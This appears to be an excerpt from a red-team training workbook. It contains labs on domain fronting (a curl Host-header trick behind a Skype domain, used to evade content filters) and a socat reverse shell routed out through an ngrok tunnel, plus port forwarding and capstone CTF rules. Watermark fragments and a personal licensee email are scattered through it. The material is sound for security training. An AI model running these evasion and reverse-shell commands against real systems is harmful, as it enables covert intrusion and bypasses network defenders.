Playing around with Domain Fronting!

While our shell is propagating, let's get everything set up to work with domain fronting. First let's understand what we are trying to do; using tcpdump we can start to get an idea of what we will be attempting to do in our environment.

Open a MATE Terminal and type the following commands:

$ sudo wireshark

This will bring up Wireshark in the environment. Wireshark will be our validation engine.



When setting up Wireshark it would be more ideal to only filter for 443 traffic. In the capture filter type:

port 443

Choose the eth0 interface, which may be the default chosen. Once you click on the shark fin it will start capturing traffic.

Now let's make a connection using curl. Open another MATE terminal and type:

$ curl https://studentXsec588.azureedge.net

In the display filter section at the top type:

ssl.handshake

This will display only the handshakes, which will show the initial Client Hello message. If we have propagated everything correctly you will see a message in Wireshark for a TLS 1.3 Client Hello message.

You need to find that message; once you do you can open it by clicking:

Secure Sockets Layer | TLS 1.3 Record Type | Handshake Protocol | Extensions: Server Name Indicator



What will our content filters see as the server we are going to? There are a few options here. One is that we will do a DNS lookup for student1sec588.azureedge.net and this will be the server that is used. There is another option, and that option is that we will not be using azureedge.net at all; we could use a legitimate service. Let's explore that option.

Click the Wireshark stop button.

We know that using our own C2 domain could be problematic. It could be blocked, or it could reveal our attacker infrastructure. Let's move to hiding our attack: what we will do is request an Azure CDN based website that is hosted by azureedge. We could find these by doing a Google dork. A few known URLs:

do.skype.com

ajax.microsoft.com

Since these sites are all HTTPS, what will our content filters see?

do.skype.com

This is a Skype URL that will be allowed through in many locations; how will we get to our attacker infrastructure? We will tell our proxy that the host we are requesting is ACTUALLY our attacker infrastructure.

Let's start Wireshark again, filtering on 443.

Going back to our window we now type a new command; this time studentXsec588.azureedge.net is going to be our Host header, NOT the host we are going to initiate communication with. The host we will initiate communication with is Skype.

Run this command:



$ curl --header "Host: studentXsec588.azureedge.net" "https://do.skype.com"

Wireshark now gets a new CLIENT HELLO. This time it will not be from studentX attacker infrastructure; it will be from do.skype.com. Our content filters will believe we are talking to that domain, and we will not be able to block it if we are legitimately using Skype in our environments.

This is how domain fronting works: both requests will provide the same results, but content filters and DNS filters will see different request destinations.


Conclusions

Domain Fronting and redirections through alternative methods can be useful in hiding what we are trying to do, specifically in avoiding detection and creating new pathways to valid websites and channels. Domain Fronting, while supposedly 'dead', is actually a valid attack path in a few service providers. The danger is that the service provider may notice that you are using this channel, so you must tread carefully.

Why This Lab Is Important

This lab shows us another way to evade detection when conducting red team activities by using the very same cloud infrastructures that we may be assessing in order to circumvent protections. Defenders have to find new and better ways to detect what it is that we are trying to do, while the attackers have to then find new ways to evade defenders. This is another great example of the cat and mouse game that we play.



Lab 5.6: Sockets and OS Redirections

Brief Intro

We will be playing with some of the redirection options to help you build really dumb relays and really simple relays as options for the following actions that you may need to use in your environment:

1. Getting a reverse shell locally
2. Using ngrok to pivot between local and remote
3. Using socat to port forward

Requirements for This Lab

This lab does not require internet connectivity; the lab is self contained, running from your computer. You will need the following tools:

Curl from the command line

ngrok, socat

Try It Yourself

We wanted to demonstrate the big difference between a lightweight shell and a bigger heavyweight shell.

1. Shovel a socat shell to yourself, and run some commands; notice that the shell is an actual shell, and not a limited shell. Run: tty
2. Bring down the ngrok http shell and move to a tcp ngrok redirection. Play with the tcp redirection and socat.
3. Forward a port with socat so that you can move from one port to another.

Walkthrough

Setting up the environment

Let's open the MATE terminal so that we can get our local environment running.



$ cd /tmp

Notice the /tmp: this will be our attacker shell; we will be creating a REVERSE connection INTO this shell.

Enter this command and hit ENTER:

$ socat file:`tty`,raw,echo=0 tcp-listen:9998

What does this command do? It opens a file handle on the current tty (the `tty` command substitution); the terminal is put in raw mode and echo is set to off (or 0).

The next part instructs it to listen on TCP port 9998.

Open another window in MATE Terminal:

$ cd /home/sec588

$ ifconfig eth0



Record the Linux IP address.

$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<your-linux-ip>:9998

What does this command do? It runs the executable bash -li, attached to a pty, with stderr, stdin, and stdout. It will then connect to your computer on port 9998.

Go back to your original window; if the prompt changes from sec588@slingshot:/tmp $ to sec588@slingshot:~$ you have now created a socat shell.

The prompt moves from /tmp to ~.

Run some additional commands such as:

tty
id
hostname
pwd

Notice that with the tty command you have a real shell! With error handling!

$ exit

Using ngrok and Socat

Hit UP or type the command in again to start listening on port 9998. Let's now add ngrok.

Open up a new shell:



$ ngrok tcp 9998

Copy the ngrok URL.

Now in the socat exec command let's change the connect address:

tcp:0.tcp.ngrok.io:<randomport>

The <randomport> will be replaced with whatever value ngrok assigns to you.

Sometimes socat will NOT resolve the 0.tcp.ngrok.io name; if this happens:

$ dig 0.tcp.ngrok.io

Record the IP address and make the socat command like so:

tcp:<PublicIpAddress>:<randomport>

This should now connect.

How can we uplevel this a bit more? What if we want a PHP redirector like the one that we described with PHP Hop? Let's next attempt this to try and further obfuscate things.

This will exit our socat.

$ exit

You will also want to 'exit' the ngrok commands.

Portforwards



Sometimes we may want to build a port forward to go from system to system. This becomes fairly trivial with socat. Let's begin by starting a webserver on port 9998.

$ cd /opt/php-webshell/code

$ python -m 'SimpleHTTPServer' 9999

Let's now curl this directory:

$ curl http://<yourLinuxIp>:9999

It should return some HTML with directories in it like below:

How would we be able to redirect this? Imagine if we wanted to:

Open a port on SystemA and redirect all those packets to SystemB.

We could use netcat by using a netcat backpipe, or we could use socat:

$ socat TCP-LISTEN:9998,fork TCP:<yourLinuxIp>:9999

Let's try this command: open a new MATE Terminal and type in this command, replacing <yourLinuxIp> with your Linux IP!

$ curl http://<yourLinuxIp>:9998



Notice that we are going to port 9998, which will redirect to your webserver on 9999! This is an example of using a socat port redirection. It is simple, lightweight, and the fork option means it will be multithreaded and multi-user.

Remember to exit all of SOCAT!

Conclusions

We have over the years seen the re-implementation of simple dumb socket servers like netcat. Over the years the tool has proved as useful as almost any penetration testing tool. What is not commonly seen used, however, and is albeit more powerful, is socat. This tool allows you to manipulate traffic in many more ways than netcat, and at times in a simpler manner, without having to worry about building pipe files or fifo files. It can also provide full working shells, and shells over avenues we may not have considered before, like a named pipe.

Why This Lab Is Important

This lab shows us two features that are valuable in a Red Team exercise:

1. The ability to get shells or use OS tools to move items around
2. Using a socket router as a way to move traffic around in a simple, easy and efficient manner. Socat affords us another avenue.

Additional Resources



Licensed To: Gregg Harris <pauljones166@outlook_com> July 28, 2020
© SANS Institute 2020
Lab 6: Our Capstone / CTF
3e1e3b497543e6c11ac8e4188959c93e
Challenge

20
Brief Intro

, 20
28
pauljones166@outlook_com
Today there is no instructions, hence there is no real PowerPoint Lab Presentation.

ly
Ju
The ow for today

>
om
_c
We have our capstone event today. You will be working in groups of three to five: no fewer than three and no more than five people. Today's Capture the Flag event is designed to model a real-world penetration test. Notably missing from this day is a scoreboard, so let's go over some rules.

Teams of three to five individuals.

Overall Project

Jetrist.com is a startup that works with influencers to design 'faux' extravagant adventures that help them boost their social media presence. Jetrist.com would like you, the individual teams of testers, to find vulnerabilities in the system that may expose sensitive client data. What data? Any data that links clients to their service, as this could affect both the Jetrist company and the social media influencers by exposing the truth. What truth? Jetrist.com makes it appear as though those influencers live the most lavish lifestyle possible, of course.

Your job is to try to find all the vulnerabilities in the environment that could lead to full compromise.

The flags and the path to victory

There are two steps to win the day!

First, the 'flags' in the environment are hints that will be shown to you on exploitation of a service. These 'flags' will both give you guidance to look further and serve as the signposts of successfully completing a challenge.

Secondly, you will need to allot from 45 minutes to an hour to construct a report. The report can be created using LibreOffice Impress or any PowerPoint/Google Slides tool that you have; the instructor will choose the top three reports and make a determination of which team has created the best presentation.

Those who combine being first to get all the flags with having one of the top-scoring reports will win.

Flags will all be called flag. Flags will provide one of two things:

1. HINTS
2. KEYS or KEY MATERIAL

How do I find flags?

The flags can be either:
1. Files called flag

2. Files called flag.extension, i.e. flag.exe, flag.html, etc.

3. Database records called flag

4. Database keys called flag

5. Other items that you can search for with the word flag.

Flags on disk will be found in either:

1. The web server root, i.e. /var/www/html/ or C:\wwwroot

2. The root of the server: / for Linux or C:\ for Windows.
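The disk search implied by the two lists above, as an added shell example that is not part of the workbook: one pass for files literally named flag or flag.<ext>, and a second pass for any text file that mentions the word flag, which is how flags stored as config values, exported database rows or key names turn up. The temporary tree it runs over, and the flag contents in it, are constructed for the demonstration only.

```shell
#!/bin/sh
# Added example, not from the workbook: hunting for flags on disk.
# The demo tree below is constructed so the search can be exercised offline;
# on a real target the roots are the web root and the filesystem root.

# Pass 1: files literally named flag or flag.<ext>, case-insensitive.
# /proc, /sys and /dev are pruned and -xdev keeps find on one filesystem, so a
# search from / does not hang on pseudo-filesystems or slow network mounts.
find_flag_files() {
    find "$@" -xdev \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
        -type f \( -iname 'flag' -o -iname 'flag.*' \) -print 2>/dev/null | sort
}

# Pass 2: text files whose contents mention the word flag.
# -r recurses, -I skips binaries, -l prints each file once, -i ignores case.
grep_flag_word() {
    grep -rIli --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev \
        'flag' "$@" 2>/dev/null | sort
}

# Count non-empty result lines (wc -l pads with spaces on some systems).
count_hits() {
    grep -c . || true
}

# Constructed demo tree: a web root holding two flags, a config file whose
# key name mentions flag, and an unrelated file that must not be reported.
make_demo_tree() {
    root="$(mktemp -d)"
    mkdir -p "$root/var/www/html/uploads" "$root/home/app"
    printf 'flag{demo-one}\n'              > "$root/var/www/html/flag"
    printf '<html>flag{demo-two}</html>\n' > "$root/var/www/html/uploads/flag.html"
    printf 'db_key=flag_secret\n'          > "$root/home/app/config.ini"
    printf 'nothing to see here\n'         > "$root/home/app/notes.txt"
    printf '%s' "$root"
}

# Opt-in demo: FLAG_DEMO=1 sh find_flags.sh
if [ "${FLAG_DEMO:-}" = "1" ]; then
    demo="$(make_demo_tree)"
    echo "== files named flag or flag.<ext> =="; find_flag_files "$demo"
    echo "== files mentioning flag ==";           grep_flag_word "$demo"
    rm -rf "$demo"
fi
```

On a real Linux target the same two passes are `find_flag_files /var/www/html /` and `grep_flag_word /var/www/html`; run the grep pass over / only when you have time to spare, since it reads every file it can open.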

Building a solid report

1. Summarize the most relevant impacts of your penetration test

2. Summarize how you found the vulnerabilities

3. List the vulnerabilities (at least minimally) from most impactful to least


4. Explain which one, or which ones, would prevent full exploitation if remediated, so that we can fix this quickly.

Hints

Build this report AS you hack. Don't wait until the end. Make sure to be creative.

We will end this competition at 1:00, and presentations will run from 1:30 to 2:30.

Scope
1. The only domain, with its associated subdomains, that is in scope for today is jetrist.com. blessed-duck.jetrist.com is the only VALID subdomain to use.

2. Services may be hosted in AWS, Azure, or even Office 365, but no other cloud environments are in scope.

3. The web applications, the VPC environments, the databases, and the virtual machines are all in scope.

4. The services in a shared remote database environment can be tested, but you cannot extract data that does not belong to jetrist.com.

5. Private container registries are in scope, as are any source code repositories.

Rules of Engagement:

1. Web Applications and Network Compute Environments for this domain are in scope
2. You must not bring down production systems, but you can install software

3. You can read keys but not change them
4. Do not add root keys

5. Do not delete any flags

6. Password brute forcing is in scope IF you construct a wordlist and make a very structured attempt; do not attempt 50,000 passwords against an account.
7. No Denial of Service Attacks
8. No Performance Hogging Attacks.

Bug Bounty

If you find a vulnerability in the class environment, you may submit it for a bug bounty, but this should not be the focus for the day. If you find an actual vulnerability in a cloud provider that you feel should be reported, you should attempt to do this.

Any Questions?
You may begin!